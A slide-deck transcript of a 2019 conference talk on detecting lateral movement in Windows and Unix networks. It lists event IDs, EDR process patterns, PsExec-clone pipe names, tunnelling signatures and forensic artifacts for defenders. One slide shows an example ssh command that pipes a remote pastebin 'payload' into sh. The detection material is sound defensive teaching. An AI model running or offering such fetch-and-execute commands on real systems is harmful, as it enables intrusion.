Spotting Lateral Movement - BSides Augusta 2019

Transcript

1. Spotting Lateral Movement Using Endpoint Data

2. ▪ Find & detect adversaries using data ▪ Recovering system

   administrator ▪ Love to teach, hate to grade homework Tony Lambert Detection Engineer/Intel RED CANARY @ForensicITGuy $env:UserName

3. > > > > > > > > > >

   > > > > > > > > > > > > > > > > > > > >

4. What the admin sees... Malicious movement

5. What’s endpoint data anyways? Lateral Movement Techniques ▪ Windows Admin

   Shares ▪ Windows Remote Management ▪ Remote Desktop Protocol ▪ Pass the Hash ▪ Exploitation of Remote Services ▪ Remote Services Overview

6. Log Data Everything has logs! Many options System integration Too

   much data? Misconfigurations

7. Endpoint Detection & Response Flight recorder Process metadata Happy medium

   Hard to manage No content Mostly for processes

8. Live Forensics Full content Max visibility Hard to scale Human

   correlation Issues with ephemeral

9. Windows Admin Shares

10. ▪ Hidden network shares for admins ▪ Copy files &

    schedule execution ▪ ADMIN$ == %SystemRoot% == C:\Windows \\win10-pc\ADMIN$ Windows Admin Shares

11. Windows Admin Shares - Copy ▪ Logs ◦ 5140 -

    Network Share Accessed ◦ 5145 - Network Share Access Checked ◦ 4624 - Account Logged On (Type 3)

12. Windows Admin Shares - Service ▪ Logs ◦ 7045 -

    New Service ▪ EDR ◦ parent process == services.exe ◦ path == System32 OR sysWOW64

13. Windows Admin Shares - Both ▪ Live Forensics ◦ New

    files in C:\Windows (NTFS Entry Number) ◦ Services in Registry (HKLM\SYSTEM\CurrentControlSet\Services)

14. Bonus! PsExec Clones ▪ Named Pipes (Sysmon Event ID 17)

    ◦ PsExec - \\.\pipe\psexesvc ◦ RemCom - \\.\pipe\remcom_comunication ◦ PaExec - *PAExec* ◦ CSExec - \\.\pipe\csexecsvc

15. Windows Remote Management

16. Windows Remote Management ▪ Admin all the systems! ▪ WinRM

    configures, can also call WMI ▪ WinRS issues remote commands ▪ WMI does a little of everything ▪ PowerShell Remoting builds on previous tools

17. WinRS ▪ Logs ◦ ID 169 - User authenticating to

    WinRM service ◦ ID 4624 - User Logged On (Logon Type 3) ▪ EDR ◦ Receiver parent process == winrshost.exe ◦ Sender process == winrs.exe -r:

18. Windows Mgmt Instrumentation ▪ Logs ◦ ID 5857 - WMI

    Activity StartedOperational ◦ ID 4624 - User Logged On (Logon Type 3 & 5) ▪ EDR ◦ Receiver parent process == wmiprvse.exe ◦ Sender process == wmic.exe /node:

19. PowerShell Remoting ▪ Logs ◦ ID 4104 - Suspicious PS

    Script Block ◦ ID 4624 - User Logged On (Logon Type 3) ▪ EDR ◦ Receiver parent process == wsmprovhost.exe ◦ Sender process == powershell.exe OR pwsh.exe

20. Windows Remote Management ▪ Live Forensics ◦ Relies heavily on

    mature logs and process auditing ◦ Process execution artifacts (Prefetch, etc…) ◦ PowerShell transcripts, ConsoleHost_history.txt

21. Remote Desktop Management

22. Remote Desktop Management ▪ Admin with a GUI ▪ Shares

    clipboard, printers, disks, etc… ▪ Often used for a desktop experience

23. Remote Desktop Management ▪ Logs ◦ ID 1149 - Successful

    RDP Remote Connection ◦ ID 4624 - User Logged On (Logon Type 10 or 7) ▪ EDR ◦ Telltale processes == rdpclip.exe ◦ Sender process == mstsc.exe

24. Remote Desktop Mgmt - Activity ▪ EDR ◦ Parent processes

    == explorer.exe, cmd.exe, etc. ▪ Live Forensics ◦ Prefetch parsing ◦ User activity forensics like local logon

25. Remote Desktop Mgmt - Tunnelling ▪ EDR ◦ plink.exe AND

    cmdline includes 127.0.0.1:3389 ◦ netsh.exe AND cmdline includes connectp AND 3389 ▪ Live Forensics ◦ HKCU\SYSTEM\CurrentControlSet\Services\PortProxy ◦ Artifacts of plink.exe execution

26. Pass the Hash

27. Pass the Hash ▪ Authentication using NTLM hashes ▪ No

    cleartext password ▪ Mitigate with Win10 Credential Guard ▪ Mitigate with Domain Protected Users group

28. Pass the Hash ▪ Logs ◦ ID 4672 - Special

    Privileges Logon ◦ ID 4624 - User Logged On (Logon Type 3 or 9) ◦ ID 10 - Sysmon (ProcessAccess lsass.exe) ◦ Not a domain logon ◦ Not the ANONYMOUS LOGON account

29. Pass the Hash ▪ EDR ◦ Doesn’t know the difference

    ▪ Live Forensics ◦ Grab the local logs ◦ Credential theft tools and material on disk

30. Exploitation of Remote Services

31. Exploitation of Remote Services ▪ On Windows, primarily Server Message

    Block (SMB) ▪ “ETERNALBLUE” or maybe “BLUEKEEP” in the future

32. Exploitation of Remote Services ▪ Logs ◦ Depending on exploit,

    sparse logging ◦ Code injection (if you have Sysmon) ▪ EDR ◦ Abnormal parent/child relationships ◦ lsass.exe, spoolsv.exe spawning child processes

33. Exploitation of Remote Services ▪ Live forensics ◦ Evidence of

    code injection (memory forensics) ◦ Exploit code left on system

34. Remote Services

35. Remote Services ▪ On Windows, SMB ▪ On macOS &

    Linux, SSH & VNC ▪ Using services designed for remote connections ▪ Not always associated with remote administration

36. Remote Services ▪ Logs ◦ Depends on service ◦ SSH

    - /var/log/secure (RHEL) /var/log/auth.log (Debian) ▪ EDR ◦ Child processes of SSHD and VNC daemons ◦ “ssh” commands with suspicious command lines

37. Remote Services ssh … [email protected] 'curl hxxps://pastebin.com/payload | sh'

38. Remote Services ▪ Live Forensics ◦ Recovering logs ◦ Filesystem

    artifacts correlated with logon ◦ Shell history

39. FEEDBACK Q & A Special thanks to: Michael Gough @hackerhurricane

    Carlos Perez @darkoperator JP-CERT @jpcert_en Matt Graeber @mattifestation MITRE ATT&CK @MITREattack SANS DFIR @sansforensics Matthew Dunwood @matthewdunwoody FireEye @fireeye Jonathon Poling @JPoForenso STEALTHbits @STEALTHbits